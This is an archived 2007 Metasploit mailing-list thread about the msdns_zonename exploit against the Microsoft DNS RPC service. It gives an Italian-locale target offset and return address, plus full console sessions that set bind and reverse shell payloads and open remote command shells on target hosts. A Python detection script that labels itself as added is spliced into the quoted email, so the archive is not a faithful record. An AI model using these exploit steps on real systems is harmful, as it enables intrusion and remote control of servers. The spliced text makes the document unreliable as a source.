Metasploit mailing list archives

Exploiting the Microsoft DNS RPC service


From: diaul at devilopers.org (diaul)
Date: Wed, 18 Apr 2007 11:05:05 +0200

Hi

You can simply add this target:

[ 'Windows 2000 Server SP0-SP4+ Italian', { 'Off' => 1213, 'Ret' => 0x74fd2ac4 } ],

By the way, some time ago I sent all Windows Italian opcodes to skape, and now
they are available in the Metasploit opcode DB.

Here is msf3 session:

<CUT>

msf exploit(ms07_019_upnp) > use exploit/windows/dcerpc/msdns_zonename
msf exploit(msdns_zonename) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Windows 2000 SP0-SP4 / Windows 2003 SP0-SP2 English
   1   Windows 2000 Server SP0-SP4+ English
   2   Windows 2000 Server SP0-SP4+ Italian
   3   Windows 2003 Server SP0 English
   4   Windows 2003 Server SP1-SP2 English


msf exploit(msdns_zonename) > set TARGET 2
TARGET => 2
msf exploit(msdns_zonename) > set PAYLOAD windows/shell_bind_tcp
PAYLOAD => windows/shell_bind_tcp
msf exploit(msdns_zonename) > set RHOST 10.4.14.47
RHOST => 10.4.14.47
msf exploit(msdns_zonename) > exploit
[*] Started bind handler
[*] Connecting to the endpoint mapper service...
[*] Discovered Microsoft DNS Server RPC service on port 1029
[*] Trying target Windows 2000 Server SP0-SP4+ Italian...
[*] Binding to 50abc2a4-574d-40b3-9d66-ee4fd5fba076:5.0 at ncacn_ip_tcp:10.4.14.47[0] ...
[*] Bound to 50abc2a4-574d-40b3-9d66-ee4fd5fba076:5.0 at ncacn_ip_tcp:10.4.14.47[0] ...
[*] Sending exploit...
[*] Error: no response from dcerpc service
[*] Command shell session 1 opened (192.168.1.80:49647 -> 10.4.14.47:4444)

Microsoft Windows 2000 [Versione 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.

C:\WINNT\system32>

</CUT>

Ciao :)

diaul


Giorgio Casali wrote:
Hi,
is it possible to have it for the Italian version?
Thanks

2007/4/16, H D Moore <hdm at metasploit.com>:

    The exploit module has been merged to stable, use 'Online Update' or
    'svn update' to grab it. The module's default target will exploit
    Windows 2000 SP0-SP4 and Windows 2003 SP0-SP2.

    All targets are designed for the English locale. If you have a
    non-English system, submit targets.

    The Windows 2003 SP0 target may not be reliable.

    The Windows 2003 SP1-SP2 targets will only work if hardware DEP is
    not in use. We use the SEH overwrite method for all targets and the
    /GS stack prevention means we will not be able to use standard
    hardware DEP bypass techniques (return to NTDLL to disable NX).

    The RPORT option defaults to '0' and will contact the endpoint mapper of
    the target system in order to determine the real RPC port at runtime.
    This saves a step, but it does mean that one of port 135 or 593 needs to
    be accessible on the target. If you are attacking a system with only
    ports > 1025 allowed through the firewall, you will need to locate the
    RPC service and set RPORT manually.

    To use the module, open the console interface, and run:
    msf> use exploit/windows/dcerpc/msdns_zonename
    msf exploit(msdns_zonename) >
    msf exploit(msdns_zonename) > set PAYLOAD <your favorite payload>
    msf exploit(msdns_zonename) > set <payload options>
    msf exploit(msdns_zonename) > set RHOST <target>
    msf exploit(msdns_zonename) > exploit

    -- example --

    < metasploit >
    ------------
           \   ,__,
            \  (oo)____
               (__)    )\
                  ||--|| *


           =[ msf v3.0
    + -- --=[ 184 exploits - 104 payloads
    + -- --=[ 17 encoders - 5 nops
           =[ 33 aux

    msf > use exploit/windows/dcerpc/msdns_zonename
    msf exploit(msdns_zonename) > set PAYLOAD windows/shell_reverse_tcp
    PAYLOAD => windows/shell_reverse_tcp
    msf exploit(msdns_zonename) > set LHOST 192.168.0.127
    LHOST => 192.168.0.127
    msf exploit(msdns_zonename) > set LPORT 4444
    LPORT => 4444
    msf exploit(msdns_zonename) > set RHOST 172.16.233.128
    RHOST => 172.16.233.128

    msf exploit(msdns_zonename) > exploit
    [*] Started reverse handler
    [*] Connecting to the endpoint mapper service...
    [*] Discovered Microsoft DNS Server RPC service on port 1356
    [*] Trying target Windows 2000 SP0-SP4 / Windows 2003 SP0-SP2 English...
    [*] Binding to 50abc2a4-574d-40b3-9d66-ee4fd5fba076:5.0 at ncacn_ip_tcp:172.16.233.128[0] ...
    [*] Bound to 50abc2a4-574d-40b3-9d66-ee4fd5fba076:5.0 at ncacn_ip_tcp:172.16.233.128[0] ...
    [*] Sending exploit...
    [*] Error: no response from dcerpc service
    [*] Command shell session 1 opened (192.168.0.127:4444 -> 192.168.0.127:45196)

    Microsoft Windows 2000 [Version 5.00.2195]
    (C) Copyright 1985-2000 Microsoft Corp.

    c:\>
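The "Binding to 50abc2a4-...:5.0" lines in both sessions are DCERPC bind requests for the Microsoft DNS Server RPC interface, reached either directly on the high port or via the endpoint mapper that HDM describes for RPORT 0. The following is an added detection sketch, not code from this thread or from the msdns_zonename module: it parses a connection-oriented DCERPC bind PDU and flags any presentation context that asks for that interface, so a sensor on the DNS server's RPC port can alert on binds from hosts that never manage DNS. The sample PDUs are constructed inline; the endpoint mapper UUID is included only as a non-matching control.

```python
import struct
import uuid

# Interface UUID shown in the session logs above: MS DNS Server RPC, v5.0.
MSDNS_RPC_IFACE = uuid.UUID("50abc2a4-574d-40b3-9d66-ee4fd5fba076")
MSDNS_RPC_VERSION = (5, 0)
# Endpoint mapper interface (v3.0) and the NDR32 transfer syntax; used to build samples.
EPM_IFACE = uuid.UUID("e1af8308-5d1f-11c9-91a4-08002b14a0fa")
NDR32_SYNTAX = uuid.UUID("8a885d04-1ceb-11c9-9fe8-08002b104860")
PTYPE_BIND = 11

def parse_bind_contexts(pdu: bytes):
    """Return [(ctx_id, interface_uuid, (major, minor))] for a DCERPC v5 bind PDU."""
    if len(pdu) < 28:
        raise ValueError("short PDU")
    ver, _minor, ptype, _flags = struct.unpack_from("<BBBB", pdu, 0)
    if ver != 5 or ptype != PTYPE_BIND:
        raise ValueError("not a DCERPC v5 bind")
    little = bool(pdu[4] & 0x10)          # drep byte: integer byte-order flag
    e = "<" if little else ">"
    if struct.unpack_from(e + "H", pdu, 8)[0] > len(pdu):
        raise ValueError("truncated fragment")
    num_ctx, off, contexts = pdu[24], 28, []
    for _ in range(num_ctx):
        ctx_id, n_syntaxes = struct.unpack_from(e + "HB", pdu, off)
        raw = pdu[off + 4:off + 20]
        iface = uuid.UUID(bytes_le=raw) if little else uuid.UUID(bytes=raw)
        ver32 = struct.unpack_from(e + "I", pdu, off + 20)[0]   # major in low 16 bits
        contexts.append((ctx_id, iface, (ver32 & 0xFFFF, ver32 >> 16)))
        off += 24 + 20 * n_syntaxes      # each transfer syntax is uuid(16) + version(4)
    return contexts

def is_msdns_bind(pdu: bytes) -> bool:
    """True if any presentation context requests the DNS Server RPC interface."""
    try:
        contexts = parse_bind_contexts(pdu)
    except ValueError:
        return False
    return any(i == MSDNS_RPC_IFACE and v == MSDNS_RPC_VERSION for _, i, v in contexts)

def build_bind(iface: uuid.UUID, major: int, minor: int, call_id: int = 1) -> bytes:
    """Construct a minimal single-context, little-endian bind PDU (sample input only)."""
    ctx = struct.pack("<HBB", 0, 1, 0) + iface.bytes_le + struct.pack("<HH", major, minor)
    ctx += NDR32_SYNTAX.bytes_le + struct.pack("<I", 2)
    body = struct.pack("<HHIBBH", 4280, 4280, 0, 1, 0, 0) + ctx
    hdr = struct.pack("<BBBB4sHHI", 5, 0, PTYPE_BIND, 0x03, b"\x10\x00\x00\x00",
                      16 + len(body), 0, call_id)
    return hdr + body

if __name__ == "__main__":
    for name, pdu in [("dns", build_bind(MSDNS_RPC_IFACE, 5, 0)), ("epm", build_bind(EPM_IFACE, 3, 0))]:
        print(name, "alert" if is_msdns_bind(pdu) else "ignore")
```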




-------------- next part --------------
A non-text attachment was scrubbed...
Name: msdns_zonename.rb
Type: application/x-ruby
Size: 4763 bytes
Desc: not available
URL: <http://mail.metasploit.com/pipermail/framework/attachments/20070418/5b9cf130/attachment.rb>

